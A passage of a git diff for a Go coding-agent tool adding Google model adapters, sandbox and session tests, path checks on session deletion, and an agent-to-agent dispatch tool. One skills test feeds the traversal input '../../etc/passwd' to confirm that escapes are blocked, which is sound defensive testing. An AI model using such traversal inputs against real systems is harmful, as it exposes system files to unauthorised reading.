+	Temperature   *float64        // nil = use API default
+	TopP          *float64        // nil = use API default
 	ModelID       string          // which model to use
 	Abort         <-chan struct{} // closed to abort the request
 }
diff --git a/internal/provider/vendor.go b/internal/provider/vendor.go
index 1db1164..7ea15b0 100644
--- a/internal/provider/vendor.go
+++ b/internal/provider/vendor.go
@@ -116,10 +116,6 @@ func ResolveAdapterConfig(cfg *config.ProviderConfig) AdapterConfig {
 		return resolved
 	}
 
-	if resolved.API == "" {
-		resolved.API = protocolFromBaseURL(cfg.BaseURL)
-	}
-
 	vendorRegistry.RLock()
 	for _, name := range vendorRegistry.order {
 		adapter := vendorRegistry.adapters[name]
@@ -131,6 +127,10 @@ func ResolveAdapterConfig(cfg *config.ProviderConfig) AdapterConfig {
 	}
 	vendorRegistry.RUnlock()
 
+	if resolved.API == "" {
+		resolved.API = protocolFromBaseURL(cfg.BaseURL)
+	}
+
 	return resolved
 }
 
diff --git a/internal/provider/vendor_google_gemini.go b/internal/provider/vendor_google_gemini.go
new file mode 100644
index 0000000..f9d10f4
--- /dev/null
+++ b/internal/provider/vendor_google_gemini.go
@@ -0,0 +1,9 @@
+package provider
+
+func init() {
+	RegisterVendorAdapter(simpleVendorAdapter{
+		name:       "google-gemini",
+		domains:    []string{"generativelanguage.googleapis.com"},
+		defaultAPI: "google-gemini",
+	})
+}
diff --git a/internal/provider/vendor_google_vertex.go b/internal/provider/vendor_google_vertex.go
new file mode 100644
index 0000000..0e1abd8
--- /dev/null
+++ b/internal/provider/vendor_google_vertex.go
@@ -0,0 +1,9 @@
+package provider
+
+func init() {
+	RegisterVendorAdapter(simpleVendorAdapter{
+		name:       "google-vertex",
+		domains:    []string{"aiplatform.googleapis.com"},
+		defaultAPI: "google-vertex",
+	})
+}
diff --git a/internal/provider/vendor_test.go b/internal/provider/vendor_test.go
index 3386918..b395aad 100644
--- a/internal/provider/vendor_test.go
+++ b/internal/provider/vendor_test.go
@@ -69,9 +69,50 @@ func TestResolveAdapterConfigGenericFallback(t *testing.T) {
 	}
 }
 
+func TestResolveAdapterConfigGoogleGemini(t *testing.T) {
+	resolved := ResolveAdapterConfig(&config.ProviderConfig{
+		BaseURL: "https://generativelanguage.googleapis.com/v1beta/models",
+	})
+	if resolved.Vendor != "google-gemini" {
+		t.Fatalf("Vendor = %q, want google-gemini", resolved.Vendor)
+	}
+	if resolved.API != "google-gemini" {
+		t.Fatalf("API = %q, want google-gemini", resolved.API)
+	}
+}
+
+func TestResolveAdapterConfigGoogleVertex(t *testing.T) {
+	resolved := ResolveAdapterConfig(&config.ProviderConfig{
+		BaseURL: "https://aiplatform.googleapis.com/v1/projects/test/locations/global/publishers/google/models",
+	})
+	if resolved.Vendor != "google-vertex" {
+		t.Fatalf("Vendor = %q, want google-vertex", resolved.Vendor)
+	}
+	if resolved.API != "google-vertex" {
+		t.Fatalf("API = %q, want google-vertex", resolved.API)
+	}
+}
+
 func TestVendorFromBaseURLDetectsXiaomiTokenPlan(t *testing.T) {
 	got := VendorFromBaseURL("https://token-plan-cn.xiaomimimo.com/v1")
 	if got != "xiaomi-token-plan-cn" {
 		t.Fatalf("VendorFromBaseURL = %q, want xiaomi-token-plan-cn", got)
 	}
 }
+
+func TestVendorFromBaseURLDetectsGoogleAdapters(t *testing.T) {
+	tests := []struct {
+		url      string
+		expected string
+	}{
+		{"https://generativelanguage.googleapis.com/v1beta/models", "google-gemini"},
+		{"https://aiplatform.googleapis.com/v1/projects/test/locations/global/publishers/google/models", "google-vertex"},
+	}
+
+	for _, tt := range tests {
+		got := VendorFromBaseURL(tt.url)
+		if got != tt.expected {
+			t.Errorf("VendorFromBaseURL(%q) = %q, want %q", tt.url, got, tt.expected)
+		}
+	}
+}
diff --git a/internal/sandbox/sandbox_test.go b/internal/sandbox/sandbox_test.go
index 2a6879f..6f0546c 100644
--- a/internal/sandbox/sandbox_test.go
+++ b/internal/sandbox/sandbox_test.go
@@ -231,6 +231,62 @@ func TestFormatSandboxInfoNil(t *testing.T) {
 	}
 }
 
+func TestManagerSetLevelNone(t *testing.T) {
+	m := NewManager("/tmp")
+
+	// Set to none should always work
+	err := m.SetLevel(LevelNone)
+	if err != nil {
+		t.Fatalf("unexpected error: %v", err)
+	}
+
+	sb := m.GetActive()
+	if sb.Level() != LevelNone {
+		t.Errorf("expected level %d, got %d", LevelNone, sb.Level())
+	}
+}
+
+func TestManagerGetForLevelInvalid(t *testing.T) {
+	m := NewManager("/tmp")
+
+	_, err := m.GetForLevel(Level(99))
+	if err == nil {
+		t.Error("expected error for invalid level")
+	}
+}
+
+func TestBwrapWrapCommand(t *testing.T) {
+	sb := NewBwrapSandbox("/tmp", LevelStandard)
+
+	cmd := sb.WrapCommand(context.Background(), "/bin/bash", "echo hello", ExecOpts{
+		WorkDir:       "/tmp",
+		WritablePaths: []string{"/tmp/extra"},
+		ReadOnlyPaths: []string{"/opt/readonly"},
+		NetworkAccess: true,
+		EnvVars:       map[string]string{"FOO": "bar"},
+	})
+
+	if cmd == nil {
+		t.Fatal("expected non-nil command")
+	}
+	// cmd.Args should contain bwrap or fallback to raw command
+	if len(cmd.Args) == 0 {
+		t.Error("expected non-empty args")
+	}
+}
+
+func TestBwrapStrictLevel(t *testing.T) {
+	sb := NewBwrapSandbox("/tmp", LevelStrict)
+
+	cmd := sb.WrapCommand(context.Background(), "/bin/bash", "ls", ExecOpts{
+		WorkDir: "/tmp",
+	})
+
+	if cmd == nil {
+		t.Fatal("expected non-nil command")
+	}
+}
+
 func TestExecOpts(t *testing.T) {
 	opts := ExecOpts{
 		WritablePaths: []string{"/tmp"},
diff --git a/internal/session/session.go b/internal/session/session.go
index 28d34af..6dff955 100644
--- a/internal/session/session.go
+++ b/internal/session/session.go
@@ -5,6 +5,7 @@ import (
 	"encoding/base64"
 	"encoding/json"
 	"fmt"
+	"log"
 	"os"
 	"path/filepath"
 	"sort"
@@ -391,8 +392,8 @@ func (m *Manager) AppendSessionInfo(name string) (string, error) {
 
 // GetMessages extracts all messages from the current branch.
 func (m *Manager) GetMessages() []provider.Message {
-	m.mu.Lock()
-	defer m.mu.Unlock()
+	m.mu.RLock()
+	defer m.mu.RUnlock()
 
 	var messages []provider.Message
 	for _, e := range m.entries {
@@ -517,14 +518,29 @@ func (m *Manager) load() error {
 		return err
 	}
 	if corruptLines > 0 {
-		return fmt.Errorf("session file has %d corrupt line(s)", corruptLines)
+		log.Printf("[session] warning: skipped %d corrupt line(s) in %s", corruptLines, m.file)
 	}
 	return nil
 }
 
 // writeEntry writes a single entry to the session file.
-// DeleteSession deletes a session file.
-func DeleteSession(path string) error {
+// DeleteSession deletes a session file if it is under sessionDir.
+func DeleteSession(path string, sessionDir string) error {
+	cleanPath, err := filepath.Abs(filepath.Clean(path))
+	if err != nil {
+		return fmt.Errorf("resolve session path: %w", err)
+	}
+	cleanSessionDir, err := filepath.Abs(filepath.Clean(sessionDir))
+	if err != nil {
+		return fmt.Errorf("resolve session dir: %w", err)
+	}
+	rel, err := filepath.Rel(cleanSessionDir, cleanPath)
+	if err != nil || rel == ".." || strings.HasPrefix(rel, ".."+string(filepath.Separator)) {
+		return fmt.Errorf("session path %s is outside session directory %s", path, sessionDir)
+	}
+	if filepath.Ext(cleanPath) != ".jsonl" {
+		return fmt.Errorf("session path %s is not a .jsonl file", path)
+	}
 	return os.Remove(path)
 }
 
@@ -598,6 +614,12 @@ func (m *Manager) writeEntry(entry interface{}) error {
 	}
 
 	data = append(data, '\n')
-	_, err = f.Write(data)
-	return err
+	if _, err := f.Write(data); err != nil {
+		return fmt.Errorf("write session entry: %w", err)
+	}
+	// fsync to guarantee durability on crash/power loss.
+	if err := f.Sync(); err != nil {
+		return fmt.Errorf("sync session file: %w", err)
+	}
+	return nil
 }
diff --git a/internal/session/session_test.go b/internal/session/session_test.go
index 1feba48..3087db2 100644
--- a/internal/session/session_test.go
+++ b/internal/session/session_test.go
@@ -490,12 +490,20 @@ func TestLoadRejectsCorruptSessionLine(t *testing.T) {
 		t.Fatalf("write session: %v", err)
 	}
 
-	_, err := Open(path)
-	if err == nil {
-		t.Fatal("expected corrupt session error")
+	// Corrupt lines are now tolerated (logged as warning) rather than rejected.
+	m, err := Open(path)
+	if err != nil {
+		t.Fatalf("expected session to load despite corrupt line, got error: %v", err)
+	}
+	if m == nil {
+		t.Fatal("expected non-nil session manager")
+	}
+	hdr := m.GetHeader()
+	if hdr == nil {
+		t.Fatal("expected header to be loaded")
 	}
-	if !strings.Contains(err.Error(), "corrupt line") {
-		t.Fatalf("err = %q, want corrupt line", err)
+	if hdr.ID != "session-id" {
+		t.Fatalf("header ID = %q, want %q", hdr.ID, "session-id")
 	}
 }
 
@@ -579,3 +587,296 @@ func TestSessionInfo(t *testing.T) {
 		}
 	}
 }
+
+func TestDeleteSession(t *testing.T) {
+	tmpDir := t.TempDir()
+	sessionDir := filepath.Join(tmpDir, "sessions")
+
+	m := New("/tmp/test", sessionDir)
+	m.Init()
+
+	path := m.GetFile()
+	if _, err := os.Stat(path); err != nil {
+		t.Fatalf("session file should exist: %v", err)
+	}
+
+	err := DeleteSession(path, sessionDir)
+	if err != nil {
+		t.Fatalf("unexpected error: %v", err)
+	}
+
+	if _, err := os.Stat(path); !os.IsNotExist(err) {
+		t.Error("expected session file to be deleted")
+	}
+}
+
+func TestDeleteSessionNonExistent(t *testing.T) {
+	sessionDir := t.TempDir()
+	err := DeleteSession(filepath.Join(sessionDir, "missing.jsonl"), sessionDir)
+	if err == nil {
+		t.Error("expected error for non-existent file")
+	}
+}
+
+func TestDeleteSessionRejectsPathOutsideSessionDir(t *testing.T) {
+	sessionDir := t.TempDir()
+	outside := filepath.Join(t.TempDir(), "outside.jsonl")
+	if err := os.WriteFile(outside, []byte("{}"), 0600); err != nil {
+		t.Fatal(err)
+	}
+
+	if err := DeleteSession(outside, sessionDir); err == nil {
+		t.Fatal("expected outside session path to be rejected")
+	}
+}
+
+func TestListForDirDetailed(t *testing.T) {
+	tmpDir := t.TempDir()
+	sessionDir := filepath.Join(tmpDir, "sessions")
+
+	// Create a session with messages
+	m := New("/tmp/test", sessionDir)
+	m.Init()
+	m.AppendMessage(provider.NewUserMessage("Hello world"))
+	m.AppendMessage(provider.NewAssistantMessage([]provider.ContentBlock{
+		{Type: "text", Text: "Hi there"},
+	}))
+	m.AppendMessage(provider.NewUserMessage("Another message"))
+
+	details, err := ListForDirDetailed("/tmp/test", sessionDir)
+	if err != nil {
+		t.Fatalf("unexpected error: %v", err)
+	}
+
+	if len(details) != 1 {
+		t.Fatalf("expected 1 session detail, got %d", len(details))
+	}
+
+	d := details[0]
+	if d.MessageCount != 3 {
+		t.Errorf("expected 3 messages, got %d", d.MessageCount)
+	}
+	if d.Preview != "Hello world" {
+		t.Errorf("expected preview 'Hello world', got %q", d.Preview)
+	}
+	if d.ID == "" {
+		t.Error("expected non-empty ID")
+	}
+}
+
+func TestListForDirDetailedLongPreview(t *testing.T) {
+	tmpDir := t.TempDir()
+	sessionDir := filepath.Join(tmpDir, "sessions")
+
+	m := New("/tmp/test", sessionDir)
+	m.Init()
+	// Message longer than 60 chars
+	longMsg := strings.Repeat("a", 100)
+	m.AppendMessage(provider.NewUserMessage(longMsg))
+
+	details, err := ListForDirDetailed("/tmp/test", sessionDir)
+	if err != nil {
+		t.Fatalf("unexpected error: %v", err)
+	}
+
+	if len(details) != 1 {
+		t.Fatalf("expected 1 session, got %d", len(details))
+	}
+
+	if len(details[0].Preview) > 64 { // 60 + "..."
+		t.Errorf("preview should be truncated, got length %d", len(details[0].Preview))
+	}
+	if !strings.HasSuffix(details[0].Preview, "...") {
+		t.Error("expected truncated preview to end with '...'")
+	}
+}
+
+func TestListForDirDetailedEmpty(t *testing.T) {
+	tmpDir := t.TempDir()
+	sessionDir := filepath.Join(tmpDir, "sessions")
+
+	details, err := ListForDirDetailed("/tmp/nonexistent", sessionDir)
+	if err != nil {
+		t.Fatalf("unexpected error: %v", err)
+	}
+	if len(details) != 0 {
+		t.Errorf("expected 0 details, got %d", len(details))
+	}
+}
+
+func TestListForDirDetailedContentBlocks(t *testing.T) {
+	tmpDir := t.TempDir()
+	sessionDir := filepath.Join(tmpDir, "sessions")
+
+	m := New("/tmp/test", sessionDir)
+	m.Init()
+	// User message with content blocks (no Content field)
+	m.AppendMessage(provider.Message{
+		Role: "user",
+		Contents: []provider.ContentBlock{
+			{Type: "text", Text: "Block content"},
+		},
+	})
+
+	details, err := ListForDirDetailed("/tmp/test", sessionDir)
+	if err != nil {
+		t.Fatalf("unexpected error: %v", err)
+	}
+
+	if len(details) != 1 {
+		t.Fatalf("expected 1 session, got %d", len(details))
+	}
+	if details[0].Preview != "Block content" {
+		t.Errorf("expected preview 'Block content', got %q", details[0].Preview)
+	}
+}
+
+func TestAppendSessionInfo(t *testing.T) {
+	tmpDir := t.TempDir()
+	sessionDir := filepath.Join(tmpDir, "sessions")
+
+	m := New("/tmp/test", sessionDir)
+	m.Init()
+
+	id, err := m.AppendSessionInfo("My Session")
+	if err != nil {
+		t.Fatalf("unexpected error: %v", err)
+	}
+	if id == "" {
+		t.Error("expected non-empty ID")
+	}
+	if len(m.entries) != 1 {
+		t.Errorf("expected 1 entry, got %d", len(m.entries))
+	}
+}
+
+func TestEncodePath(t *testing.T) {
+	// Same path should produce same encoding
+	e1 := encodePath("/tmp/test")
+	e2 := encodePath("/tmp/test")
+	if e1 != e2 {
+		t.Error("expected same encoding for same path")
+	}
+
+	// Different paths should produce different encodings
+	e3 := encodePath("/tmp/test2")
+	if e1 == e3 {
+		t.Error("expected different encoding for different path")
+	}
+
+	// Paths that are similar but different should not collide
+	e4 := encodePath("/tmp/test-1")
+	e5 := encodePath("/tmp/test:1")
+	if e4 == e5 {
+		t.Error("expected different encoding for paths with different special chars")
+	}
+}
+
+func TestInitWithID(t *testing.T) {
+	tmpDir := t.TempDir()
+	sessionDir := filepath.Join(tmpDir, "sessions")
+
+	m := New("/tmp/test", sessionDir)
+	err := m.InitWithID("custom-id")
+	if err != nil {
+		t.Fatalf("unexpected error: %v", err)
+	}
+
+	header := m.GetHeader()
+	if header.ID != "custom-id" {
+		t.Errorf("expected ID 'custom-id', got %q", header.ID)
+	}
+}
+
+func TestSessionFileID(t *testing.T) {
+	tests := []struct {
+		path     string
+		expected string
+	}{
+		{"/path/to/20240101-120000_abcd1234.jsonl", "abcd1234"},
+		{"/path/to/session.jsonl", ""},
+		{"simple_id.jsonl", "id"},
+	}
+
+	for _, tt := range tests {
+		result := sessionFileID(tt.path)
+		if result != tt.expected {
+			t.Errorf("sessionFileID(%q) = %q, want %q", tt.path, result, tt.expected)
+		}
+	}
+}
+
+func TestOpenByPathOrIDEmptyValue(t *testing.T) {
+	_, err := OpenByPathOrID("/tmp", "/tmp/sessions", "")
+	if err == nil {
+		t.Error("expected error for empty value")
+	}
+}
+
+func TestSessionRoundTrip(t *testing.T) {
+	tmpDir := t.TempDir()
+	sessionDir := filepath.Join(tmpDir, "sessions")
+
+	// Create session with various entry types
+	m1 := New("/tmp/test", sessionDir)
+	m1.Init()
+	m1.AppendMessage(provider.NewUserMessage("Hello"))
+	m1.AppendMessage(provider.NewAssistantMessage([]provider.ContentBlock{
+		{Type: "text", Text: "Hi"},
+	}))
+	m1.AppendModelChange("anthropic", "claude-sonnet-4-20250514")
+	m1.AppendThinkingLevelChange("high")
+	m1.AppendCompaction("Summary", "", 1000)
+	m1.AppendSessionInfo("Test Session")
+
+	// Re-open and verify all entries loaded
+	m2, err := Open(m1.GetFile())
+	if err != nil {
+		t.Fatalf("unexpected error: %v", err)
+	}
+
+	if len(m2.entries) != 6 {
+		t.Errorf("expected 6 entries, got %d", len(m2.entries))
+	}
+
+	msgs := m2.GetMessages()
+	if len(msgs) != 2 {
+		t.Errorf("expected 2 messages, got %d", len(msgs))
+	}
+}
+
+// TestWriteEntryDurable verifies that entries are fsynced and survive reopen.
+func TestWriteEntryDurable(t *testing.T) {
+	tmpDir := t.TempDir()
+	sessionDir := filepath.Join(tmpDir, "sessions")
+
+	m := New("/tmp/test", sessionDir)
+	if err := m.Init(); err != nil {
+		t.Fatalf("init: %v", err)
+	}
+
+	// Append several messages
+	for i := 0; i < 5; i++ {
+		msg := provider.NewUserMessage(fmt.Sprintf("message %d", i))
+		if _, err := m.AppendMessage(msg); err != nil {
+			t.Fatalf("append message %d: %v", i, err)
+		}
+	}
+
+	// Re-open from disk — all 5 messages + 1 header should be present
+	reopened, err := Open(m.GetFile())
+	if err != nil {
+		t.Fatalf("reopen: %v", err)
+	}
+
+	loadedMsgs := reopened.GetMessages()
+	if len(loadedMsgs) != 5 {
+		t.Errorf("expected 5 messages after reopen, got %d", len(loadedMsgs))
+	}
+
+	// Verify content of last message
+	last := loadedMsgs[4]
+	if last.Content != "message 4" {
+		t.Errorf("last message content = %q, want 'message 4'", last.Content)
+	}
+}
diff --git a/internal/skills/skills_test.go b/internal/skills/skills_test.go
index ab8453b..548d8b7 100644
--- a/internal/skills/skills_test.go
+++ b/internal/skills/skills_test.go
@@ -323,6 +323,202 @@ func TestCreateProjectSkillsDir(t *testing.T) {
 	}
 }
 
+func TestParseReferences(t *testing.T) {
+	tmpDir := t.TempDir()
+
+	content := `# API Skill
+
+### 1. 基础 (references/base.md) [已加载]
+### 2. 高级 (references/advanced.md) [待按需加载]
+
+## References
+- [概述](references/overview.md)
+`
+
+	refs := parseReferences(content, tmpDir)
+	if len(refs) != 3 {
+		t.Fatalf("expected 3 references, got %d", len(refs))
+	}
+
+	// Check first ref is auto-load
+	if !refs[0].AutoLoad {
+		t.Error("expected first ref to be auto-loaded")
+	}
+	if refs[0].Path != "references/base.md" {
+		t.Errorf("expected path 'references/base.md', got %q", refs[0].Path)
+	}
+
+	// Check second ref is on-demand
+	if refs[1].AutoLoad {
+		t.Error("expected second ref to be on-demand")
+	}
+
+	// Check third ref from markdown link
+	if refs[2].Path != "references/overview.md" {
+		t.Errorf("expected path 'references/overview.md', got %q", refs[2].Path)
+	}
+	if refs[2].Label != "概述" {
+		t.Errorf("expected label '概述', got %q", refs[2].Label)
+	}
+}
+
+func TestParseReferencesDedup(t *testing.T) {
+	tmpDir := t.TempDir()
+
+	// Same ref in both header and link - should deduplicate
+	content := `# Skill
+### 1. Base (references/base.md) [已加载]
+- [Base](references/base.md)
+`
+	refs := parseReferences(content, tmpDir)
+	if len(refs) != 1 {
+		t.Errorf("expected 1 reference (deduped), got %d", len(refs))
+	}
+}
+
+func TestParseReferencesEmpty(t *testing.T) {
+	refs := parseReferences("# No references here", "/tmp")
+	if len(refs) != 0 {
+		t.Errorf("expected 0 references, got %d", len(refs))
+	}
+}
+
+func TestLoadReference(t *testing.T) {
+	tmpDir := t.TempDir()
+	skillDir := filepath.Join(tmpDir, "test-skill")
+	refsDir := filepath.Join(skillDir, "references")
+	os.MkdirAll(refsDir, 0755)
+
+	// Create skill with references
+	os.WriteFile(filepath.Join(skillDir, "SKILL.md"), []byte(`# Test
+### 1. Base (references/base.md) [待按需加载]
+`), 0644)
+	os.WriteFile(filepath.Join(refsDir, "base.md"), []byte("# Base Content\nThis is the base."), 0644)
+
+	m := NewManager(tmpDir, "")
+	m.Load()
+
+	// Load a known reference
+	content, ok := m.LoadReference("test-skill", "references/base.md")
+	if !ok {
+		t.Fatal("expected successful load")
+	}
+	if !contains(content, "Base Content") {
+		t.Errorf("expected content to contain 'Base Content', got %q", content)
+	}
+
+	// Load again (should use cached)
+	content2, ok := m.LoadReference("test-skill", "references/base.md")
+	if !ok {
+		t.Fatal("expected successful cached load")
+	}
+	if content != content2 {
+		t.Error("expected same content on cached load")
+	}
+}
+
+func TestLoadReferenceDirectFile(t *testing.T) {
+	tmpDir := t.TempDir()
+	skillDir := filepath.Join(tmpDir, "test-skill")
+	os.MkdirAll(skillDir, 0755)
+
+	os.WriteFile(filepath.Join(skillDir, "SKILL.md"), []byte("# Test Skill"), 0644)
+	os.WriteFile(filepath.Join(skillDir, "extra.md"), []byte("# Extra"), 0644)
+
+	m := NewManager(tmpDir, "")
+	m.Load()
+
+	// Load directly by path (not a parsed reference)
+	content, ok := m.LoadReference("test-skill", "extra.md")
+	if !ok {
+		t.Fatal("expected successful direct load")
+	}
+	if !contains(content, "Extra") {
+		t.Error("expected content to contain 'Extra'")
+	}
+}
+
+func TestLoadReferencePathEscape(t *testing.T) {
+	tmpDir := t.TempDir()
+	skillDir := filepath.Join(tmpDir, "test-skill")
+	os.MkdirAll(skillDir, 0755)
+	os.WriteFile(filepath.Join(skillDir, "SKILL.md"), []byte("# Test"), 0644)
+
+	m := NewManager(tmpDir, "")
+	m.Load()
+
+	// Attempt path traversal
+	_, ok := m.LoadReference("test-skill", "../../etc/passwd")
+	if ok {
+		t.Error("expected path escape to be blocked")
+	}
+}
+
+func TestLoadReferenceNonexistentSkill(t *testing.T) {
+	m := NewManager("", "")
+	m.Load()
+
+	_, ok := m.LoadReference("nonexistent", "file.md")
+	if ok {
+		t.Error("expected false for nonexistent skill")
+	}
+}
+
+func TestListReferences(t *testing.T) {
+	tmpDir := t.TempDir()
+	skillDir := filepath.Join(tmpDir, "test-skill")
+	os.MkdirAll(skillDir, 0755)
+	os.WriteFile(filepath.Join(skillDir, "SKILL.md"), []byte(`# Test
+### 1. Ref (references/ref.md) [待按需加载]
+`), 0644)
+
+	m := NewManager(tmpDir, "")
+	m.Load()
+
+	refs := m.ListReferences("test-skill")
+	if len(refs) != 1 {
+		t.Errorf("expected 1 reference, got %d", len(refs))
+	}
+
+	// Nonexistent skill
+	refs = m.ListReferences("nonexistent")
+	if refs != nil {
+		t.Error("expected nil for nonexistent skill")
+	}
+}
+
+func TestBuildSkillContextWithReferences(t *testing.T) {
+	tmpDir := t.TempDir()
+	skillDir := filepath.Join(tmpDir, "test-skill")
+	refsDir := filepath.Join(skillDir, "references")
+	os.MkdirAll(refsDir, 0755)
+
+	os.WriteFile(filepath.Join(skillDir, "SKILL.md"), []byte(`# Test Skill
+### 1. Auto (references/auto.md) [已加载]
+### 2. OnDemand (references/ondemand.md) [待按需加载]
+`), 0644)
+	os.WriteFile(filepath.Join(refsDir, "auto.md"), []byte("Auto-loaded content"), 0644)
+	os.WriteFile(filepath.Join(refsDir, "ondemand.md"), []byte("On-demand content"), 0644)
+
+	m := NewManager(tmpDir, "")
+	m.Load()
+
+	ctx := m.BuildSkillContext("test-skill")
+
+	if !contains(ctx, "Auto-loaded content") {
+		t.Error("expected auto-loaded content in context")
+	}
+	if contains(ctx, "On-demand content") {
+		t.Error("on-demand content should NOT be auto-loaded")
+	}
+	if !contains(ctx, "On-Demand References") {
+		t.Error("expected on-demand references section")
+	}
+	if !contains(ctx, "skill_ref") {
+		t.Error("expected skill_ref tool mention")
+	}
+}
+
 func TestSkill(t *testing.T) {
 	skill := &Skill{
 		Name:        "test",
diff --git a/internal/tools/a2a_dispatch.go b/internal/tools/a2a_dispatch.go
new file mode 100644
index 0000000..adb0595
--- /dev/null
+++ b/internal/tools/a2a_dispatch.go
@@ -0,0 +1,105 @@
+package tools
+
+import (
+	"context"
+	"encoding/json"
+	"fmt"
+)
+
+// A2ADispatcher is the interface needed by the a2a_dispatch tool.
+// It is satisfied by a2a.A2AManager.
+type A2ADispatcher interface {
+	List() []AgentEntry
+	Dispatch(ctx context.Context, name, message string) (string, error)
+}
+
+// AgentEntry is a minimal view of a remote A2A agent.
+type AgentEntry struct {
+	Name string
+	URL  string
+}
+
+// A2ADispatchTool sends tasks to registered remote A2A agents.
+type A2ADispatchTool struct {
+	dispatcher A2ADispatcher
+}
+
+// NewA2ADispatchTool creates a new A2A dispatch tool.
+func NewA2ADispatchTool(dispatcher A2ADispatcher) *A2ADispatchTool {
+	return &A2ADispatchTool{dispatcher: dispatcher}
+}
+
+func (t *A2ADispatchTool) Name() string {
+	return "a2a_dispatch"
+}
+
+func (t *A2ADispatchTool) Description() string {
+	return "Send a task to a registered remote A2A agent. The agent will execute the task and return the result."
+}
+
+func (t *A2ADispatchTool) PromptSnippet() string {
+	return "Dispatch tasks to remote A2A agents"
+}
+
+func (t *A2ADispatchTool) PromptGuidelines() []string {
+	return []string{
+		"Use a2a_dispatch to delegate tasks to specialized remote agents.",
+		"Each agent has specific capabilities described in its Agent Card.",
+		"Long-running tasks may take up to 5 minutes to complete.",
+	}
+}
+
+func (t *A2ADispatchTool) Parameters() json.RawMessage {
+	// Build enum from registered agents
+	agents := t.dispatcher.List()
+	agentNames := make([]string, 0, len(agents))
+	for _, a := range agents {
+		agentNames = append(agentNames, a.Name)
+	}
+
+	// Build agent descriptions for the LLM
+	agentDesc := "Available agents:\n"
+	for _, a := range agents {
+		agentDesc += fmt.Sprintf("  - %s (%s)\n", a.Name, a.URL)
+	}
+
+	return json.RawMessage(fmt.Sprintf(`{
+		"type": "object",
+		"properties": {
+			"agent_name": {
+				"type": "string",
+				"description": %q,
+				"enum": %s
+			},
+			"message": {
+				"type": "string",
+				"description": "The task message to send to the agent"
+			}
+		},
+		"required": ["agent_name", "message"]
+	}`, agentDesc, mustMarshalJSON(agentNames)))
+}
+
+func (t *A2ADispatchTool) Execute(ctx context.Context, params map[string]any) (ToolResult, error) {
+	agentName, ok := params["agent_name"].(string)
+	if !ok || agentName == "" {
+		return ToolResult{}, fmt.Errorf("missing required parameter: agent_name")
+	}
+
+	message, ok := params["message"].(string)
+	if !ok || message == "" {
+		return ToolResult{}, fmt.Errorf("missing required parameter: message")
+	}
+
+	result, err := t.dispatcher.Dispatch(ctx, agentName, message)
+	if err != nil {
+		return ToolResult{}, err
+	}
+
+	return NewTextToolResult(result), nil
+}
+
+func mustMarshalJSON(v any) string {
+	data, _ := json.Marshal(v)
+	return string(data)
+}
diff --git a/internal/tools/bash.go b/internal/tools/bash.go
index f37dcf5..e59cd37 100644
--- a/internal/tools/bash.go
+++ b/internal/tools/bash.go
@@ -14,6 +14,7 @@ import (
 
 	"github.com/startvibecoding/vibecoding/internal/platform"
 	"github.com/startvibecoding/vibecoding/internal/sandbox"
+	"github.com/startvibecoding/vibecoding/internal/util"
 	"github.com/startvibecoding/vibecoding/internal/vendored"
 )
 
@@ -162,9 +163,9 @@ func (t *BashTool) Execute(ctx context.Context, params map[string]any) (ToolResu
 	workDir := t.registry.GetWorkDir()
 
 	// 构建环境变量，将 ~/.vibecoding/bin 加入 PATH
-	rgPath := vendored.RgPath()
 	vendoredBin := ""
-	if rgPath != "" {
+	if vendored.HasEmbeddedTools() {
+		rgPath := vendored.RgPath()
 		vendoredBin = filepath.Dir(rgPath)
 	}
 	env := os.Environ()
@@ -234,15 +235,18 @@ func (t *BashTool) Execute(ctx context.Context, params map[string]any) (ToolResu
 		return NewTextToolResult(fmt.Sprintf("Started background job [%d] (PID: %d): %s\nUse 'jobs' tool to check status or 'kill' to stop.", job.ID, job.PID, command)), nil
 	}
 
-	// Synchronous mode
-	var stdout, stderr bytes.Buffer
-	cmd.Stdout = &stdout
-	cmd.Stderr = &stderr
+	// Synchronous mode (1 GB output limit per stream)
+	const maxSyncOutput = 1 << 30 // 1 GB
+	stdout := newLimitedBuffer(maxSyncOutput)
+	stderr := newLimitedBuffer(maxSyncOutput)
+	cmd.Stdout = stdout
+	cmd.Stderr = stderr
 
 	err := cmd.Run()
 
-	stdoutStr := strings.TrimRight(stdout.String(), "\n")
-	stderrStr := strings.TrimRight(stderr.String(), "\n")
+	stdoutStr := strings.TrimRight(string(stdout.Bytes()), "\n")
+	stderrStr := string(stderr.Bytes())
+	stderrStr = strings.TrimRight(stderrStr, "\n")
 	if stdoutStr == "" {
 		stdoutStr = "(no output)"
 	}
@@ -273,8 +277,9 @@ func (t *BashTool) Execute(ctx context.Context, params map[string]any) (ToolResu
 	const maxOutput = 50000
 	resultStr := result.String()
 	if len(resultStr) > maxOutput {
-		truncated := len(resultStr) - maxOutput
-		resultStr = resultStr[:maxOutput] + fmt.Sprintf("\n... (truncated %d bytes)", truncated)
+		prefix := util.TruncateString(resultStr, maxOutput)
+		truncated := len(resultStr) - len(prefix)
+		resultStr = prefix + fmt.Sprintf("\n... (truncated %d bytes)", truncated)
 	}
 
 	if err != nil {
diff --git a/internal/tools/coverage_test.go b/internal/tools/coverage_test.go
index 9d417c0..40095e7 100644
--- a/internal/tools/coverage_test.go
+++ b/internal/tools/coverage_test.go
@@ -1,7 +1,9 @@
 package tools
 
 import (
+	"strings"
 	"testing"
+	"time"
 
 	"github.com/startvibecoding/vibecoding/internal/sandbox"
 )
@@ -155,6 +157,12 @@ func TestRegistryResolvePath(t *testing.T) {
 		t.Error("expected error for path escape")
 	}
 
+	// Sibling directory with same prefix should fail.
+	_, err = r.ResolvePath("/home/user/project2/file.txt")
+	if err == nil {
+		t.Error("expected error for sibling prefix path escape")
+	}
+
 	// Tilde expansion - may fail if home is outside workdir
 	_, err = r.ResolvePath("~")
 	// This is expected to fail if home dir is outside workdir
@@ -173,3 +181,83 @@ func TestSetSandbox(t *testing.T) {
 		t.Error("expected updated sandbox")
 	}
 }
+
+// TestLimitedBuffer_Truncate verifies that limitedBuffer truncates output at maxSize.
+func TestLimitedBuffer_Truncate(t *testing.T) {
+	lb := newLimitedBuffer(100)
+
+	// Write less than max — no truncation
+	lb.Write([]byte("hello"))
+	out := lb.Bytes()
+	if string(out) != "hello" {
+		t.Fatalf("expected 'hello', got %q", string(out))
+	}
+
+	// Write more than max — should truncate
+	lb2 := newLimitedBuffer(100)
+	bigData := make([]byte, 200)
+	for i := range bigData {
+		bigData[i] = 'A'
+	}
+	lb2.Write(bigData)
+	out2 := lb2.Bytes()
+	if len(out2) != 100+len("\n... (truncated 100 bytes)") {
+		t.Errorf("expected truncated output of length %d, got %d: %q",
+			100+len("\n... (truncated 100 bytes)"), len(out2), string(out2))
+	}
